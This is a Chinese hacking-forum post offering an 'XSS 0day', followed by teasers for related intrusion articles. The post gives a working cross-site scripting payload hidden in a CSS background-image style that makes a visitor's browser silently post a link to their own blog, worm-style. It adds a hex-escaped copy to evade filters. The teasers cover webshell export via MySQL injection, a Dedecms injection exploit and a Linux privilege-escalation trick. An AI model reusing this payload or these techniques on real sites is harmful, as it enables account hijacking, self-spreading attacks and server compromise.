XSS 0DAY代码
所属分类:
实用技巧 / 安全教程
阅读数:
779
收藏 0赞 0分享
文章作者:茄子宝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
看到梦之光芒放出来了!我也不藏了!
10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧.
其实很简单,就是两次转码.
<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">
ASCII转码参考 http://s0n9.blog.sohu.com/16002288.html
写成下面16进制转义字符串
<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div>
MySQL注入中导出字段内容的研究通过注入导出WebShell
大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
收藏 0赞 0分享
Dedecms getip()的漏洞利用代码
flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:
收藏 0赞 0分享
非常不错的脚本入侵基础知识总结第1/2页
简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。
收藏 0赞 0分享
linux提权用的一个技巧
一个linux提权用的技巧,放出来全当找工作攒RP了。 OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本
收藏 0赞 0分享
查看更多